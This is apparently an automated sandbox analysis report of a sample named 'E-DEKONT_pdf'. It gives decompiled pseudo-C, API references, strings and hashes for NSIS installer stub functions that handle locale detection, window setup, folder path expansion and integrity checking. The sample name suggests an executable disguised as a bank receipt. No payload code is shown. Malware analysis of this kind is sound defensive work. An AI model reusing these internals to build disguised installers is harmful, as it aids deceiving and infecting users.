				int _t34;
				int _t35;
				int _t39;
				char _t57;
				CHAR* _t59;
				signed char _t63;
				signed short _t67;
				CHAR* _t74;
				intOrPtr _t76;
				CHAR* _t81;

				_t76 =  *0x7c5f70;
				_t17 = E00406640(2);
				_t84 = _t17;
				if(_t17 == 0) {
					_t74 = 0x7b0d68;
					 *0x7f7000 = 0x30;
					 *0x7f7001 = 0x78;
					 *0x7f7002 = 0;
					E0040611B(_t71, __eflags, 0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x7b0d68, 0);
					__eflags =  *0x7b0d68;
					if(__eflags == 0) {
						E0040611B(_t71, __eflags, 0x80000003, ".DEFAULT\\Control Panel\\International",  &M0040836A, 0x7b0d68, 0);
					}
					lstrcatA(0x7f7000, _t74);
				} else {
					_t67 =  *_t17(); // executed
					E00406192(0x7f7000, _t67 & 0x0000ffff);
				}
				E00403CDF(_t71, _t84);
				 *0x7c5fe0 =  *0x7c5f78 & 0x00000020;
				 *0x7c5ffc = 0x10000;
				if(E00405CB4(_t84, 0x7f1000) != 0) {
					L16:
					if(E00405CB4(_t92, 0x7f1000) == 0) {
						E004062C7(0, _t74, _t76, 0x7f1000,  *((intOrPtr*)(_t76 + 0x118))); // executed
					}
					_t25 = LoadImageA( *0x7c5f60, 0x67, "true", 0, 0, 0x8040); // executed
					 *0x7c1f48 = _t25;
					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t27 = E00403CDF(_t71, __eflags);
							__eflags =  *0x7c6000;
							if( *0x7c6000 != 0) {
								_t28 = E00405427(_t27, 0);
								__eflags = _t28;
								if(_t28 == 0) {
									E0040140B("true");
									goto L33;
								}
								__eflags =  *0x7c1f2c;
								if( *0x7c1f2c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x7b0d48, 5); // executed
							_t34 = E004065D2("RichEd20"); // executed
							__eflags = _t34;
							if(_t34 == 0) {
								E004065D2("RichEd32");
							}
							_t81 = "RichEdit20A";
							_t35 = GetClassInfoA(0, _t81, 0x7c1f00);
							__eflags = _t35;
							if(_t35 == 0) {
								GetClassInfoA(0, "RichEdit", 0x7c1f00);
								 *0x7c1f24 = _t81;
								RegisterClassA(0x7c1f00);
							}
							_t39 = DialogBoxParamA( *0x7c5f60,  *0x7c1f40 + 0x00000069 & 0x0000ffff, 0, E00403DB7, 0); // executed
							E0040396A(E0040140B(5), "true");
							return _t39;
						}
						L22:
						_t31 = 2;
						return _t31;
					} else {
						_t71 =  *0x7c5f60;
						 *0x7c1f04 = 0x401000;
						 *0x7c1f10 =  *0x7c5f60;
						 *0x7c1f14 = _t25;
						 *0x7c1f24 = 0x40a1f4;
						if(RegisterClassA(0x7c1f00) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoA(0x30, 0,  &_v16, 0);
						 *0x7b0d48 = CreateWindowExA(0x80, 0x40a1f4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x7c5f60, 0);
						goto L21;
					}
				} else {
					_t71 =  *(_t76 + 0x48);
					_t86 = _t71;
					if(_t71 == 0) {
						goto L16;
					}
					_t74 = 0x7bdf00;
					E0040611B(_t71, _t86,  *((intOrPtr*)(_t76 + 0x44)), _t71,  *((intOrPtr*)(_t76 + 0x4c)) +  *0x7c5f98, 0x7bdf00, 0);
					_t57 =  *0x7bdf00; // 0x43
					if(_t57 == 0) {
						goto L16;
					}
					if(_t57 == 0x22) {
						_t74 = 0x7bdf01;
						 *((char*)(E00405BF1(0x7bdf01, 0x22))) = 0;
					}
					_t59 = lstrlenA(_t74) + _t74 - 4;
					if(_t59 <= _t74 || lstrcmpiA(_t59, ?str?) != 0) {
						L15:
						E00406234(0x7f1000, E00405BC6(_t74));
						goto L16;
					} else {
						_t63 = GetFileAttributesA(_t74);
						if(_t63 == 0xffffffff) {
							L14:
							E00405C0D(_t74);
							goto L15;
						}
						_t92 = _t63 & 0x00000010;
						if((_t63 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x00403a20
0x00403a29
0x00403a30
0x00403a32
0x00403a46
0x00403a58
0x00403a5f
0x00403a66
0x00403a6c
0x00403a71
0x00403a77
0x00403a8a
0x00403a8a
0x00403a95
0x00403a34
0x00403a34
0x00403a3f
0x00403a3f
0x00403a9a
0x00403aad
0x00403ab2
0x00403ac3
0x00403b4a
0x00403b52
0x00403b5b
0x00403b5b
0x00403b71
0x00403b77
0x00403b85
0x00403c06
0x00403c0e
0x00403c18
0x00403c1d
0x00403c23
0x00403cad
0x00403cb2
0x00403cb4
0x00403cd0
0x00000000
0x00403cd0
0x00403cb6
0x00403cbc
0x00403cc4
0x00403cc4
0x00000000
0x00403cbc
0x00403c31
0x00403c3c
0x00403c41
0x00403c43
0x00403c4a
0x00403c4a
0x00403c55
0x00403c5d
0x00403c5f
0x00403c61
0x00403c6a
0x00403c6d
0x00403c73
0x00403c73
0x00403c92
0x00403ca3
0x00000000
0x00403ca8
0x00403c10
0x00403c12
0x00000000
0x00403b87
0x00403b87
0x00403b93
0x00403b9d
0x00403ba3
0x00403ba8
0x00403bb7
0x00403cd5
0x00403cd5
0x00000000
0x00403cd5
0x00403bc6
0x00403c01
0x00000000
0x00403c01
0x00403ac9
0x00403ac9
0x00403acc
0x00403ace
0x00000000
0x00000000
0x00403ad8
0x00403ae8
0x00403aed
0x00403af4
0x00000000
0x00000000
0x00403af8
0x00403afa
0x00403b07
0x00403b07
0x00403b0f
0x00403b15
0x00403b3d
0x00403b45
0x00000000
0x00403b27
0x00403b28
0x00403b31
0x00403b37
0x00403b38
0x00000000
0x00403b38
0x00403b33
0x00403b35
0x00000000
0x00000000
0x00000000
0x00403b35
0x00403b15

APIs

Part of subcall function 00406640: GetModuleHandleA.KERNEL32(?,00000000,?,004034D2,0000000B), ref: 00406652
Part of subcall function 00406640: GetProcAddress.KERNEL32(00000000,?), ref: 0040666D

GetUserDefaultUILanguage.KERNELBASE(00000002,767C3410,007F9000,?,007EF000,00000009,0000000B), ref: 00403A34

Part of subcall function 00406192: wsprintfA.USER32 ref: 0040619F

lstrcatA.KERNEL32(007F7000,007B0D68,80000001,Control Panel\Desktop\ResourceLocale,00000000,007B0D68,00000000,00000002,767C3410,007F9000,?,007EF000,00000009,0000000B), ref: 00403A95
lstrlenA.KERNEL32(007BDF00,?,?,?,007BDF00,00000000,007F1000,007F7000,007B0D68,80000001,Control Panel\Desktop\ResourceLocale,00000000,007B0D68,00000000,00000002,767C3410), ref: 00403B0A
lstrcmpiA.KERNEL32(?,.exe), ref: 00403B1D
GetFileAttributesA.KERNEL32(007BDF00,?,007EF000,00000009,0000000B), ref: 00403B28
LoadImageA.USER32(00000067,?,00000000,00000000,00008040,007F1000), ref: 00403B71
RegisterClassA.USER32(007C1F00), ref: 00403BAE
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403BC6
CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403BFB
ShowWindow.USER32(00000005,00000000,?,007EF000,00000009,0000000B), ref: 00403C31
GetClassInfoA.USER32(00000000,RichEdit20A,007C1F00), ref: 00403C5D
GetClassInfoA.USER32(00000000,RichEdit,007C1F00), ref: 00403C6A
RegisterClassA.USER32(007C1F00), ref: 00403C73
DialogBoxParamA.USER32(?,00000000,00403DB7,00000000), ref: 00403C92

Strings

RichEdit20A, xrefs: 00403C55, 00403C5B
RichEd20, xrefs: 00403C37
_Nb, xrefs: 00403B8D, 00403BF5
.DEFAULT\Control Panel\International, xrefs: 00403A80
h{, xrefs: 00403A46
RichEd32, xrefs: 00403C45
RichEdit, xrefs: 00403C64
.exe, xrefs: 00403B17
Control Panel\Desktop\ResourceLocale, xrefs: 00403A4E

Memory Dump Source

Source File: 00000000.00000002.3223507204.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3223451448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223585427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000078D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000791000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007BD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3225698903.00000000008BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_E-DEKONT_pdf.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$h{
API String ID: 606308-796287222
Opcode ID: fce42fd06847e8b204695c8d1af10d699451b87d998d25604c18b81cf034ac1f
Instruction ID: 5ddc04f458ae52a3378d50e56fefae16c5672a1df0abdb0b3b38ae058e06b781
Opcode Fuzzy Hash: fce42fd06847e8b204695c8d1af10d699451b87d998d25604c18b81cf034ac1f
Instruction Fuzzy Hash: 6F61E571244604AEE3106F659D46F3B3B6CEB8574AF00403EF941B62E3CB7DAD419A2D

Uniqueness

Uniqueness Score: -1.00%

Function 004062C7 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 198
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 72%

			E004062C7(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				struct _ITEMIDLIST* _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t36;
				CHAR* _t37;
				signed int _t39;
				char _t50;
				char _t52;
				char _t54;
				void* _t62;
				char* _t63;
				signed int _t77;
				char _t85;
				void* _t86;
				CHAR* _t87;
				void* _t89;
				signed int _t94;
				signed int _t96;
				void* _t97;

				_t89 = __esi;
				_t86 = __edi;
				_t62 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t36 =  *( *0x7c1f3c - 4 + _t36 * 4);
				}
				_push(_t62);
				_push(_t89);
				_push(_t86);
				_t63 = _t36 +  *0x7c5f98;
				_t37 = 0x7bdf00;
				_t87 = 0x7bdf00;
				if(_a4 >= 0x7bdf00 && _a4 - 0x7bdf00 < 0x4000) {
					_t87 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t85 =  *_t63;
					if(_t85 == 0) {
						break;
					}
					__eflags = _t87 - _t37 - 0x2000;
					if(_t87 - _t37 >= 0x2000) {
						break;
					}
					_t63 = _t63 + 1;
					__eflags = _t85 - 4;
					_a8 = _t63;
					if(__eflags >= 0) {
						if(__eflags != 0) {
							 *_t87 = _t85;
							_t87 =  &(_t87[1]);
							__eflags = _t87;
						} else {
							 *_t87 =  *_t63;
							_t87 =  &(_t87[1]);
							_t63 = _t63 + 1;
						}
						continue;
					}
					_t39 =  *((char*)(_t63 + 1));
					_t77 =  *_t63;
					_t94 = (_t39 & 0x0000007f) << 0x00000007 | _t77 & 0x0000007f;
					_v24 = _t77;
					_v28 = _t77 | 0x00000080;
					_v16 = _t39;
					_v20 = _t39 | 0x00000080;
					_t63 = _a8 + 2;
					__eflags = _t85 - 2;
					if(_t85 != 2) {
						__eflags = _t85 - 3;
						if(_t85 != 3) {
							__eflags = _t85 - 1;
							if(_t85 == 1) {
								__eflags = (_t39 | 0xffffffff) - _t94;
								E004062C7(_t63, _t87, _t94, _t87, (_t39 | 0xffffffff) - _t94);
							}
							L42:
							_t87 =  &(_t87[lstrlenA(_t87)]);
							_t37 = 0x7bdf00;
							continue;
						}
						__eflags = _t94 - 0x1d;
						if(_t94 != 0x1d) {
							__eflags = (_t94 << 0xd) + 0x7c7000;
							E00406234(_t87, (_t94 << 0xd) + 0x7c7000);
						} else {
							E00406192(_t87,  *0x7c5f68);
						}
						__eflags = _t94 + 0xffffffeb - 7;
						if(_t94 + 0xffffffeb < 7) {
							L33:
							E00406512(_t87);
						}
						goto L42;
					}
					__eflags =  *0x7c601c;
					_t96 = 2;
					if( *0x7c601c != 0) {
						L13:
						_a8 = 1;
						L14:
						__eflags =  *0x7c5fe4;
						if( *0x7c5fe4 != 0) {
							_t96 = 4;
						}
						__eflags = _t77;
						if(__eflags >= 0) {
							__eflags = _t77 - 0x25;
							if(_t77 != 0x25) {
								__eflags = _t77 - 0x24;
								if(_t77 == 0x24) {
									GetWindowsDirectoryA(_t87, 0x2000);
									_t96 = 0;
								}
								while(1) {
									__eflags = _t96;
									if(_t96 == 0) {
										goto L30;
									}
									_t50 =  *0x7c5f64;
									_t96 = _t96 - 1;
									__eflags = _t50;
									if(_t50 == 0) {
										L26:
										_t52 = SHGetSpecialFolderLocation( *0x7c5f68,  *(_t97 + _t96 * 4 - 0x18),  &_v8);
										__eflags = _t52;
										if(_t52 != 0) {
											L28:
											 *_t87 =  *_t87 & 0x00000000;
											__eflags =  *_t87;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v8, _t87);
										_v12 = _t52;
										__imp__CoTaskMemFree(_v8);
										__eflags = _v12;
										if(_v12 != 0) {
											goto L30;
										}
										goto L28;
									}
									__eflags = _a8;
									if(_a8 == 0) {
										goto L26;
									}
									_t54 =  *_t50( *0x7c5f68,  *(_t97 + _t96 * 4 - 0x18), 0, 0, _t87); // executed
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L26;
								}
								goto L30;
							}
							GetSystemDirectoryA(_t87, 0x2000);
							goto L30;
						} else {
							E0040611B((_t77 & 0x0000003f) +  *0x7c5f98, __eflags, 0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t77 & 0x0000003f) +  *0x7c5f98, _t87, _t77 & 0x00000040); // executed
							__eflags =  *_t87;
							if( *_t87 != 0) {
								L31:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t87, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L33;
							}
							E004062C7(_t63, _t87, _t96, _t87, _v16);
							L30:
							__eflags =  *_t87;
							if( *_t87 == 0) {
								goto L33;
							}
							goto L31;
						}
					}
					__eflags =  *0x7c601e - 0x45a;
					if( *0x7c601e >= 0x45a) {
						goto L13;
					}
					__eflags = _t39 - 0x23;
					if(_t39 == 0x23) {
						goto L13;
					}
					__eflags = _t39 - 0x2e;
					if(_t39 == 0x2e) {
						goto L13;
					} else {
						_a8 = _a8 & 0x00000000;
						goto L14;
					}
				}
				 *_t87 =  *_t87 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E00406234(_a4, _t37);
			}

0x004062c7
0x004062c7
0x004062c7
0x004062cd
0x004062d2
0x004062e3
0x004062e3
0x004062eb
0x004062ec
0x004062ed
0x004062ee
0x004062f1
0x004062f9
0x004062fb
0x00406312
0x00406315
0x00406315
0x004064ef
0x004064ef
0x004064f3
0x00000000
0x00000000
0x00406322
0x00406328
0x00000000
0x00000000
0x0040632e
0x0040632f
0x00406332
0x00406335
0x004064e2
0x004064ec
0x004064ee
0x004064ee
0x004064e4
0x004064e6
0x004064e8
0x004064e9
0x004064e9
0x00000000
0x004064e2
0x0040633b
0x0040633f
0x0040634f
0x00406356
0x00406359
0x00406361
0x00406364
0x0040636b
0x0040636c
0x0040636f
0x0040648f
0x00406492
0x004064c2
0x004064c5
0x004064ca
0x004064ce
0x004064ce
0x004064d3
0x004064d9
0x004064db
0x00000000
0x004064db
0x00406494
0x00406497
0x004064ac
0x004064b3
0x00406499
0x004064a0
0x004064a0
0x004064bb
0x004064be
0x00406487
0x00406488
0x00406488
0x00000000
0x004064be
0x00406375
0x0040637e
0x0040637f
0x0040639c
0x0040639c
0x004063a3
0x004063a3
0x004063aa
0x004063ae
0x004063ae
0x004063af
0x004063b1
0x004063ea
0x004063ed
0x004063fd
0x00406400
0x00406408
0x0040640e
0x0040640e
0x0040646d
0x0040646d
0x0040646f
0x00000000
0x00000000
0x00406412
0x00406419
0x0040641a
0x0040641c
0x00406436
0x00406444
0x0040644a
0x0040644c
0x0040646a
0x0040646a
0x0040646a
0x00000000
0x0040646a
0x00406452
0x0040645b
0x0040645e
0x00406464
0x00406468
0x00000000
0x00000000
0x00000000
0x00406468
0x0040641e
0x00406421
0x00000000
0x00000000
0x00406430
0x00406432
0x00406434
0x00000000
0x00000000
0x00000000
0x00406434
0x00000000
0x0040646d
0x004063f5
0x00000000
0x004063b3
0x004063ce
0x004063d3
0x004063d6
0x00406476
0x00406476
0x0040647a
0x00406482
0x00406482
0x00000000
0x0040647a
0x004063e0
0x00406471
0x00406471
0x00406474
0x00000000
0x00000000
0x00000000
0x00406474
0x004063b1
0x00406381
0x0040638a
0x00000000
0x00000000
0x0040638c
0x0040638f
0x00000000
0x00000000
0x00406391
0x00406394
0x00000000
0x00406396
0x00406396
0x00000000
0x00406396
0x00406394
0x004064f9
0x00406503
0x0040650f
0x0040650f
0x00000000

APIs

GetSystemDirectoryA.KERNEL32(007BDF00,00002000), ref: 004063F5
GetWindowsDirectoryA.KERNEL32(007BDF00,00002000,?,Skipped: C:\Users\user\AppData\Local\Temp\nsvA708.tmp\System.dll,00000000,0040538D,Skipped: C:\Users\user\AppData\Local\Temp\nsvA708.tmp\System.dll,00000000), ref: 00406408
SHGetSpecialFolderLocation.SHELL32(0040538D,767C23A0,?,Skipped: C:\Users\user\AppData\Local\Temp\nsvA708.tmp\System.dll,00000000,0040538D,Skipped: C:\Users\user\AppData\Local\Temp\nsvA708.tmp\System.dll,00000000), ref: 00406444
SHGetPathFromIDListA.SHELL32(767C23A0,007BDF00), ref: 00406452
CoTaskMemFree.OLE32(767C23A0), ref: 0040645E
lstrcatA.KERNEL32(007BDF00,\Microsoft\Internet Explorer\Quick Launch), ref: 00406482
lstrlenA.KERNEL32(007BDF00,?,Skipped: C:\Users\user\AppData\Local\Temp\nsvA708.tmp\System.dll,00000000,0040538D,Skipped: C:\Users\user\AppData\Local\Temp\nsvA708.tmp\System.dll,00000000,00000000,0079EE4E,767C23A0), ref: 004064D4

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 0040647C
Software\Microsoft\Windows\CurrentVersion, xrefs: 004063C4
Skipped: C:\Users\user\AppData\Local\Temp\nsvA708.tmp\System.dll, xrefs: 004062EC

Memory Dump Source

Source File: 00000000.00000002.3223507204.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3223451448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223585427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000078D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000791000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007BD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3225698903.00000000008BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_E-DEKONT_pdf.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsvA708.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 717251189-1476065726
Opcode ID: 05beea9c2200e4339c4589f30d71f1b0f05bb69f4356543a49310692c94cd44b
Instruction ID: 780d57d12d18bacdf627d66ab7eec5908f792e41889780379f835f4b7a3ad036
Opcode Fuzzy Hash: 05beea9c2200e4339c4589f30d71f1b0f05bb69f4356543a49310692c94cd44b
Instruction Fuzzy Hash: 26615570900114AEEF216F24CD94BBE3BA5AB05310F16813FE943BA2D1D73D89A1DB5E

Uniqueness

Uniqueness Score: -1.00%

Function 00402F0C Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 181
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E00402F0C(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _t50;
				void* _t53;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				 *0x7c5f6c = GetTickCount() + 0x3e8;
				GetModuleFileNameA(0, 0x7fd000, 0x2000);
				_t89 = E00405DC7(0x7fd000, 0x80000000, 3);
				_v16 = _t89;
				 *0x40a018 = _t89;
				if(_t89 == 0xffffffff) {
					return "Error launching installer";
				}
				E00406234(0x7f5000, 0x7fd000);
				E00406234(0x7ff000, E00405C0D(0x7f5000));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x7a6d24 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402EA8("true");
					__eflags =  *0x7c5f74 - _t82;
					if( *0x7c5f74 == _t82) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t53 = GlobalAlloc(0x40, _v24); // executed
						_t94 = _t53;
						E00403348( *0x7c5f74 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E00403143(); // executed
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x7c5f70 = _t94;
							 *0x7c5f78 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x7c5f7c =  *0x7c5f7c + 1;
								__eflags =  *0x7c5f7c;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, "true"); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405D82(0x7c5f80, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E00403348( *0x79ad18);
					_t65 = E00403332( &_a4, 4);
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x7c5f74) & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E00403332(0x792d18, _t90);
						__eflags = _t71;
						if(_t71 == 0) {
							E00402EA8("true");
							L29:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x7c5f74;
						if( *0x7c5f74 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402EA8(0);
							}
							goto L20;
						}
						E00405D82( &_v44, 0x792d18, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x79ad18; // 0x560f8
						 *0x7c6000 =  *0x7c6000 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x7c5f74 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t24 = _t80 - 4; // 0x5
							_t93 = _t24;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x7a6d24; // 0x560fc
						if(__eflags < 0) {
							_v12 = E004066F7(_v12, 0x792d18, _t90);
						}
						 *0x79ad18 =  *0x79ad18 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 != 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}

0x00402f14
0x00402f17
0x00402f1a
0x00402f34
0x00402f39
0x00402f4c
0x00402f51
0x00402f54
0x00402f5a
0x00000000
0x00402f5c
0x00402f6d
0x00402f7e
0x00402f85
0x00402f8b
0x00402f8d
0x00402f92
0x00402f94
0x0040307f
0x00403081
0x00403086
0x0040308d
0x00000000
0x00000000
0x0040308f
0x00403092
0x004030b6
0x004030bb
0x004030c1
0x004030cc
0x004030d1
0x004030d4
0x004030d5
0x004030d6
0x004030d8
0x004030dd
0x004030e0
0x004030f3
0x004030f7
0x004030ff
0x00403104
0x00403106
0x00403106
0x00403106
0x0040310e
0x0040310e
0x00403111
0x00403112
0x00403112
0x00403115
0x00403117
0x00403117
0x00403117
0x00403121
0x00403127
0x00403135
0x0040313a
0x00000000
0x0040313a
0x00000000
0x004030e0
0x0040309a
0x004030a5
0x004030aa
0x004030ac
0x00000000
0x00000000
0x004030b1
0x004030b4
0x00000000
0x00000000
0x00000000
0x00402f9a
0x00402f9f
0x00402fa4
0x00402fa8
0x00402faf
0x00402fb4
0x00402fb6
0x00402fb8
0x00402fb8
0x00402fbc
0x00402fc1
0x00402fc3
0x004030eb
0x004030e2
0x00000000
0x004030e2
0x00402fc9
0x00402fd0
0x0040304c
0x00403050
0x00403054
0x00403059
0x00000000
0x00403050
0x00402fd9
0x00402fde
0x00402fe1
0x00402fe6
0x00000000
0x00000000
0x00402fe8
0x00402fef
0x00000000
0x00000000
0x00402ff1
0x00402ff8
0x00000000
0x00000000
0x00402ffa
0x00403001
0x00000000
0x00000000
0x00403003
0x0040300a
0x00000000
0x00000000
0x0040300c
0x00403012
0x0040301b
0x00403021
0x00403024
0x00403026
0x0040302c
0x00000000
0x00000000
0x00403032
0x00403036
0x0040303e
0x0040303e
0x00403041
0x00403041
0x00403044
0x00403046
0x00403048
0x00403048
0x00000000
0x00403046
0x00403038
0x0040303c
0x00000000
0x00000000
0x00000000
0x0040305a
0x0040305a
0x00403060
0x0040306c
0x0040306c
0x0040306f
0x00403075
0x00403075
0x00403075
0x0040307d
0x0040307d
0x00000000
0x0040307d

APIs

GetTickCount.KERNEL32 ref: 00402F1D
GetModuleFileNameA.KERNEL32(00000000,007FD000,00002000,?,?,004036DA,?,?,00000007,00000009,0000000B), ref: 00402F39

Part of subcall function 00405DC7: GetFileAttributesA.KERNELBASE(00000003,00402F4C,007FD000,80000000,00000003,?,?,004036DA,?,?,00000007,00000009,0000000B), ref: 00405DCB
